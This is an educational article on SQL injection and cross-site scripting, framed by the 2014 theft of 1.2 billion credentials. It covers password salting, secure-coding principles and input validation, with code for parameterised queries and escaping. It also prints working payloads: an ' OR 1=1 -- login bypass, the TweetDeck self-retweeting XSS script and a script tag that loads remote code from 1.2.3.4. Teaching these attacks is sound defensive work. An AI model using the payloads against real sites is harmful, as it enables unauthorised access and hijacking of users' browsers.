SQL Injection: Shooting 1.2 Billion Fish in a Barrel using Someone Else’s Gun

Introduction

No one thought that the scale of a hack could go much beyond the Adobe compromise, which involved 150 million passwords, but it just did when, on 5 August 2014, it was announced that over 1.2 billion usernames and passwords had been gathered from across the Internet. The reasons that this gathering worked so well point to three things: bad coding practice on Web sites (where the user input is not checked, and goes straight through to the database), the usage of proxy agents (bots) to both probe and gather the usernames and passwords, and phishing emails (which are used to compromise a host so that it becomes a bot). These three things make it easy for intruders to target the collection of data, press the button, and wait. They then have a whole army of data harvesters, which are basically infected computers around the Internet. As long as there’s an unpatched system somewhere on the Internet, there’s the potential for a bot to work on behalf of someone. As said previously in this blog, the three main targets are Adobe Reader, Adobe Flash and Oracle Java [Blog].

Unfortunately all three of the problems point to two things: humans producing bad code (not checking their code) and humans being silly (not patching their systems). So, as we will see, the root of many of the current vulnerabilities is XSS (Cross-site Scripting) and SQL Injection, which are caused by coders not understanding that there might be people who want to compromise their system. Developers are often under pressure when rolling out their code, and only test it for valid inputs. Along with this, they will often disable security controls when operational issues occur, and then forget to put them back in place. A current target, though, is copy-and-pasted PHP code, which is often left unmodified and without any security checking. The figure of 100:1 is often used for the ratio of hours/effort spent developing the system (dev ops) against the hours spent operating and evaluating the system (sys ops). It is obvious that this needs to change, and in this post we’ll see some of the pointers towards this.

The Heartbleed vulnerability stemmed from a human coding error within the OpenSSL encryption library, and highlighted that it is humans who often cause the most serious security vulnerabilities. Often these vulnerabilities can be traced to poor software development methods or practices. For example, the Adobe hack, which exposed nearly 150 million passwords, had several pointers to poor security practice, including the fact that users could select extremely weak passwords which could be easily cracked. Another standard process which Adobe missed was to add salt to the encrypted version of the password. Salting makes it much more difficult to crack passwords in a database, even when weak passwords have been used. The following outlines the details behind the Adobe hack:

It can be seen from this that nearly 2 million users selected “123456” as their password, and once one password is cracked, every other account with the same password is also cracked (note: a salted system does not reveal which other accounts share the same source password).
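The effect of salting can be sketched in a few lines of Python. This is only an illustration and not a description of how Adobe stored its passwords: the function names, the 16-byte salt and the PBKDF2 iteration count are assumptions made for the example. Without a salt, two users with the same password end up with the same stored value, whereas with a per-user random salt they do not.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple


def unsalted_hash(password: str) -> str:
    # Same password always gives the same digest, so one crack reveals all matches.
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def salted_hash(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    # Assumption for this sketch: 16 random bytes of salt and 100,000 PBKDF2 rounds.
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)
    return salt, digest


def verify(password: str, salt: bytes, expected: bytes) -> bool:
    # Recompute with the stored salt and compare in constant time.
    return hmac.compare_digest(salted_hash(password, salt)[1], expected)


# Two users who both chose "123456".
alice_plain = unsalted_hash("123456")
bob_plain = unsalted_hash("123456")
alice_salt, alice_digest = salted_hash("123456")
bob_salt, bob_digest = salted_hash("123456")

print("unsalted values identical:", alice_plain == bob_plain)
print("salted values identical:  ", alice_digest == bob_digest)
print("alice can still log in:   ", verify("123456", alice_salt, alice_digest))
```

The salt is stored alongside the digest; it does not need to be secret, as its job is only to make each stored value unique.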

Hackers now have a whole range of tools in their toolbox, and can command a large number of proxy agents (each known as a bot, and controlled remotely as part of a botnet) which do the vulnerability probing and data stealing on their behalf. Anyone listening to the network will not be able to find the original source of the probing, as it is done by one of the compromised agents. Creating a botnet agent is often fairly simple for the hackers, as it normally involves sending a phishing email, such as one with a link that appears to go to an HMRC online Web page, which compromises the host through unpatched software. Commonly compromised software includes Adobe Reader, Adobe Flash and Oracle Java. A backdoor agent is downloaded onto the compromised host, and then listens for events, such as logging into bank systems. The agents can also be used to send requests to remote sites, such as probing for usernames and passwords, and for DDoS (Distributed Denial of Service).

One of the easiest ways for an intruder to steal data, and one which often succeeds, is to use either XSS (Cross-site Scripting) or SQL Injection. With XSS, the intruder forces some script into the page to make it act incorrectly, and with SQL Injection the page passes an SQL command through to the database, which can reveal its content. If the developer does not check their code, or does not undertake a penetration test, the Web site can be at risk.

Forget Heartbleed, this is worse!

On 5 August 2014, Hold Security, a Milwaukee-based company, released details of their investigation of a Russia-based criminal gang where the hackers stole 1.2 billion username/password combinations, along with more than 500 million email addresses. It thus puts both the Adobe hack (150 million usernames and passwords released) and Heartbleed into the shade.

This revelation was unveiled at the Black Hat computer-security conference in Las Vegas (2-7 August 2014). Ironically, this was the same conference at which two researchers from Carnegie Mellon University (Alexander Volynkin and Michael McCord) were to present their work on the exploitation of the Tor (The Onion Router) infrastructure, but their research presentation was pulled for reasons which are currently unknown.

There are thought to be 12 hackers involved in the password-stealing attack, who have been purchasing information on the online black market since 2011. In the latest exploit, the Russian hackers used malware-infected hosts (typically infected through a phishing email sent to unpatched systems) to gather over 4.5 billion records. These hosts probed remote Web sites for SQL vulnerabilities and, when one was discovered, executed SQL injections to gain usernames and passwords. Overall they managed to compromise over 400,000 Web and FTP sites. A major problem with this is that users often use the same password for many different sites, so a compromise of one of their accounts could lead to a compromise of their other accounts for some time into the future.

SQL Injection

Many databases use a number of tables to store data records, where the tables have a defined relationship between each other; this is known as a relational database. These often use SQL to search for data across the tables. SQL was developed at IBM in the early 1970s, and is still used within many software infrastructures. It uses a simple language to define the data tables to be accessed, and the parameters used to search for fields in the data records. An example of SQL is shown next:
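The original example is not reproduced here, so the following is a stand-in sketch rather than the author’s own. It uses Python’s built-in sqlite3 module with an in-memory database, and the customers and orders tables (and their contents) are invented purely for illustration. It shows two related tables and an SQL query which searches across both.

```python
import sqlite3

# In-memory database, so nothing is written to disk.
conn = sqlite3.connect(":memory:")

# Two hypothetical tables: each order points at a customer through customer_id.
conn.executescript("""
CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT);
CREATE TABLE orders (
    id INTEGER PRIMARY KEY,
    customer_id INTEGER REFERENCES customers(id),
    item TEXT
);
INSERT INTO customers VALUES (1, 'Alice'), (2, 'Bob');
INSERT INTO orders VALUES (1, 1, 'Laptop'), (2, 1, 'Mouse'), (3, 2, 'Keyboard');
""")

# SELECT names the fields, FROM/JOIN names the tables, WHERE gives the search parameter.
rows = conn.execute(
    "SELECT customers.name, orders.item "
    "FROM customers JOIN orders ON orders.customer_id = customers.id "
    "WHERE customers.name = ? "
    "ORDER BY orders.id",
    ("Alice",),
).fetchall()

for name, item in rows:
    print(name, "ordered", item)
```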

The problem of SQL injection typically involves software developers not checking the input from the user (or from a bot request), so that SQL fragments posted in the Web request are forwarded directly to the database. This problem is commonly seen on LAMP (Linux, Apache, MySQL and PHP) Web sites, which often use PHP code to send SQL requests to a MySQL database. A typical call to a database is:

SELECT * FROM accounts WHERE username='$admin' AND password='$pass'

When the user enters “admin” and “password”, this gives:

SELECT * FROM accounts WHERE username='admin' AND password='password'

An intruder could then change this to:

SELECT * FROM accounts WHERE username='admin' AND password='' OR 1=1 -- '

This will always return true for the match, as OR 1=1 is true for every row and the -- comments out the trailing quote. To achieve this, enter the following as the password:

' OR 1=1 --

This is then converted into a URL-encoded string:

%20%27%20%4f%52%20%31%3d%31%20%2d%2d%20
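The encoding can be checked with Python’s standard urllib.parse module, as a small sketch. Note that the string above percent-encodes every character, whereas quote() leaves letters, digits and the hyphen as they are; both forms decode to the same payload.

```python
from urllib.parse import quote, unquote

encoded = "%20%27%20%4f%52%20%31%3d%31%20%2d%2d%20"

# Decode the percent-encoded string back into the injected text.
decoded = unquote(encoded)
print(repr(decoded))

# Re-encode it; quote() only escapes the characters that need it.
reencoded = quote(decoded, safe="")
print(reencoded)
```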

When this is injected into the URL request for the page, the query matches every row, and the page can reveal all the usernames and passwords in the database. There is an almost infinite number of these exploits, and an intruder will generally play around with a canary (forcing some text into the input and observing what happens). The following shows a demo of SQL Injection in an isolated infrastructure:
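The demo itself is not reproduced here. As a rough stand-in, the injection can be sketched with Python and an in-memory SQLite database rather than the PHP and MySQL setup described above. The table contents and the two function names are assumptions for illustration only. The first function builds the query by pasting the input into the SQL string; the second passes the input as parameters, so that it is treated purely as data.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE accounts (username TEXT, password TEXT)")
# Plain-text passwords are used here only to keep the demo short.
conn.executemany(
    "INSERT INTO accounts VALUES (?, ?)",
    [("admin", "s3cret"), ("bob", "hunter2")],
)


def login_vulnerable(username: str, password: str) -> list:
    # Unchecked input is concatenated straight into the SQL statement.
    query = (
        "SELECT * FROM accounts WHERE username='" + username
        + "' AND password='" + password + "'"
    )
    return conn.execute(query).fetchall()


def login_parameterised(username: str, password: str) -> list:
    # Placeholders keep the input out of the SQL grammar entirely.
    return conn.execute(
        "SELECT * FROM accounts WHERE username=? AND password=?",
        (username, password),
    ).fetchall()


payload = "' OR 1=1 -- "

print("vulnerable:   ", login_vulnerable("admin", payload))
print("parameterised:", login_parameterised("admin", payload))
```

With the injected password the vulnerable version returns every row in the table, while the parameterised version returns nothing, as no account has that literal string as its password.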

XSS (Cross-site Scripting)

TweetDeck started to spam tweets across the Internet. This was caused by adding a heart symbol (♥) to a tweet, which caused TweetDeck to run a script contained in the tweet, send a message to the user, and retweet links which had just arrived:

<script class="xss">$('.xss').parents().eq(1).find('a').eq(1).click();
$('[data-action=retweet]').click();alert('XSS in Tweetdeck')</script>♥

This highlights the current problem, where Web developers spend very little time on analysing user input for malicious code. In the simplest case, a value is taken from the user input and echoed straight to the Web page without checking, so when the user enters:

<script>alert('Oops I have been compromised');</script>

it is then echoed to the page and, of course, the browser will run it as a piece of JavaScript, and display a message box with “Oops I have been compromised”. A common method of breaching a page is where unchecked user input is used to inject malicious code from a remote site. For example:

<script src="http://1.2.3.4/test.js"></script>

will inject some malicious code from a server at 1.2.3.4 into the page, which can cause a whole range of problems, such as breaching the login requirements for a page.
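One common defence is to escape user input before echoing it into the page. The following is a minimal sketch in Python using the standard html.escape function; the two render functions are hypothetical names for this example, and a real site would normally rely on the escaping built into its templating system.

```python
import html


def render_comment_unsafe(user_input: str) -> str:
    # Echoes the input straight into the page, as in the vulnerable case.
    return "<p>" + user_input + "</p>"


def render_comment(user_input: str) -> str:
    # Converts <, >, & and quotes into HTML entities so the browser shows them as text.
    return "<p>" + html.escape(user_input) + "</p>"


attack = "<script>alert('Oops I have been compromised');</script>"

print(render_comment_unsafe(attack))
print(render_comment(attack))
```

In the escaped version the browser displays the text of the script rather than running it.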

Key factors in system design

A software bug is either intentional or non-intentional. With an intentional bug, the developer has added a backdoor into the code which, when exercised, will allow a remote party into the system. One company that was accused of this is Crypto AG who, it is reported, colluded with the Bundesnachrichtendienst (BND) and the National Security Agency (NSA) to read the encrypted traffic on the machines with the backdoor. Non-intentional bugs can be classified as:

  • Validation flaws. The code fails to check for valid input data. This is often a major problem with Web-based code, where the code has not been tested for the complete range of user inputs. An intruder can often probe and analyse responses, and then craft an input which breaches the operation of the code. As seen in the TweetDeck hack, the input injects some JavaScript into a link, and then does an automated click on the link. The link thus becomes a robot-clicking link, and can be used to spam other users, and even bring down systems with a Denial of Service attack.
  • Domain flaws. This is where data leaks from one program to another.
  • Serialisation flaws. This is where data changes while being passed from one program to another.
  • Identification/Authentication flaws. This is where there is a lack of identification for processes or users.
  • Boundary condition flaws. This is where resource access is not checked, and can thus allow an external hacker to use up resources.
  • Logic flaws. This is where the logic of the program, such as the way it implements loops or decisions, causes the program to act incorrectly.

Some of the key factors in the design of software are:

  • Never trust user input. All user input should be checked before it is used. This includes checking for correct number/string format, including valid characters.
  • Principle of least privilege. Processes and scripts should run with the least privilege possible, to minimize damage.
  • Use secure defaults. Developers sometimes encounter problems with security controls when running applications. It is important that these are fully tested before reducing the security.
  • Authenticate at the front-end. In terms of resources, it is often better to authenticate at the front-end rather than the back-end.
  • Never trust external systems. External systems should always be seen as a potential risk, and should never be fully trusted.
  • Reduce surface area. The system should minimize the information that can be accessed from outside, and handle errors in a graceful way.
  • Never rely on obfuscated code. Obfuscation of code just makes it more difficult to determine its operation. If an intruder wants to “crack” a program, then they normally can, so other methods of securing the code should be employed.
  • Defence-in-depth. Checkpoints should be added for authentication and authorization at software interfaces, and interfaces within modules.
  • If it’s not used … disable it! Any services which can be accessed can be compromised, thus, if they are not needed, they should be disabled.
  • System is only as secure as the weakest link. The overall security of a system is only as strong as its weakest link.

One of the threats that is often fairly easy for an intruder to exploit is where the user input is not checked and, as the XSS examples show, this is how some JavaScript code can be injected into the page.

Why don’t we teach security in coding?

Academia has been teaching coding since the 1950s, from FORTRAN and COBOL to modern languages such as C# and Java. Unfortunately the way we teach it has not really changed, where we teach our students to code around a procedural and/or object-oriented approach. Academics thus spend much of their time teaching students how to design and specify a program, then how to write it, and finally how to validate it. The validation process is often running the program with some normal data, then with some boundary conditions, and that is it. If the student is smart, they will make sure they do not trust the user input, so values are entered as strings, and then checked and converted into the correct format. So a sloppy piece of code is:

using System;

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            int age;
            Console.WriteLine("What is your age?");
            // No checking: any non-integer input throws an exception here
            age=Convert.ToInt32(Console.ReadLine());
            Console.WriteLine("Your age is " + age);
            Console.ReadLine();
        }
    }
}

which works fine when we enter an integer:

What is your age? 
32
Your age is 32

but when we enter “a” we get an exception of:

Input string was not in a correct format.

Having examined many student programs, one thing that is often missing is the checking and catching of exceptions with try … catch (Exception) {} code. A better way is to actually check the characters entered to see whether the value is valid, such as for an integer. So if the value is negative, or greater than 110, or has letters, or has an invalid character, then tell the user, and ask them for the correct format.
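The checks described above can be sketched as follows. This is written in Python rather than the C# of the surrounding listings, and the function name and error messages are assumptions for illustration. The input is kept as a string, its characters are checked, and only then is it converted and range-checked.

```python
def parse_age(text: str) -> int:
    """Return the age as an integer, or raise ValueError with a reason."""
    text = text.strip()
    # Only the ASCII digits 0-9 are accepted, which rules out letters,
    # minus signs, decimal points and empty input.
    if not (text.isascii() and text.isdigit()):
        raise ValueError("age must be a whole, non-negative number")
    age = int(text)
    # The upper limit of 110 follows the text above.
    if age > 110:
        raise ValueError("age must not be greater than 110")
    return age


for sample in ["32", "a", "-5", "200", ""]:
    try:
        print(repr(sample), "->", parse_age(sample))
    except ValueError as err:
        print(repr(sample), "-> rejected:", err)
```

In an interactive program the same function would sit inside a loop which keeps asking the user until a valid value is entered.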

A good example of this is when a user is entering their IP address. In this case we can use a regular expression to look for four values with up to three digits, with a ‘.’ in-between:

using System;
using System.Text.RegularExpressions;

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("Enter an IP address:");
            string ip = Console.ReadLine();
            // Four groups of one to three digits separated by dots;
            // ^ and $ reject any extra text around the address
            Match match = Regex.Match(ip, @"^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$");
            if (match.Success)
            {
                Console.WriteLine("IP is "+match.Value);
            }
            else Console.WriteLine("Invalid");
            Console.ReadLine();
        }
    }
}

The result is then:

Enter an IP address: 
1.2.3.4
IP is 1.2.3.4
Enter an IP address:
1.2..4
Invalid

Regular expressions are thus a wonderful method for checking user input, to make sure that it matches the requirements. They provide a gate for the code, where the program does not enter regions of the code unless the input has been validated.
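A pattern of up to three digits per group will still accept a value such as 999.1.1.1, so the gate can be tightened with a range check after the match. The following is a sketch in Python rather than C#, with a hypothetical function name; Python’s standard ipaddress module offers a ready-made alternative.

```python
import re

# Four groups of one to three ASCII digits, separated by dots.
IPV4_PATTERN = re.compile(r"[0-9]{1,3}(\.[0-9]{1,3}){3}")


def is_valid_ipv4(text: str) -> bool:
    # fullmatch() requires the whole string to fit the pattern,
    # so surrounding text is rejected.
    if IPV4_PATTERN.fullmatch(text) is None:
        return False
    # Each of the four values must also be in the range 0 to 255.
    return all(int(part) <= 255 for part in text.split("."))


for sample in ["1.2.3.4", "1.2..4", "999.1.1.1", "abc1.2.3.4"]:
    print(sample, "->", "valid" if is_valid_ipv4(sample) else "Invalid")
```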

Conclusions

The main problem here is the lack of skills among software developers, especially Web developers, in understanding the security risks of their sites, and in building the checking of input data into their code. Our software is moving to the Web, where much of the code does not run as a Windows or Mac program. The code that runs on Web servers is often quite messy, and there’s a general lack of testing. Software development teams must thus learn the methods of securing their code, especially checking data input at the gate, and never trusting user input. For some reason, we often don’t teach security to software developers, especially how to handle exceptions in user input or from external systems, and how to encrypt data. This lack of understanding often leads to passwords and user credentials not being stored in a secure way. This, for the future, needs to change!

For many software programs now, the coding is becoming easier, as we link to trusted services or to well-defined software libraries, but the testing and validation become more difficult. Often as much time is spent testing, validating and evaluating a program and its modules as it takes to design, specify and implement it. Our teaching thus needs to change.

As for patching, we are at a crossroads, where our mobile apps quite happily patch themselves on a regular basis, and never cause any issues, but on desktops we have grown to distrust the auto-patcher, especially in Microsoft Windows, where patches have often caused more problems than they solve. So desktop users often reach for the disable button when problems arise, and leave it switched off. Unfortunately patching cannot solve the SQL injection problem, but a lack of patching does feed the zombie army on the Internet, whose bots either collect from the user, or probe and collect from remote systems, making it almost impossible to find the original source of the maliciousness.
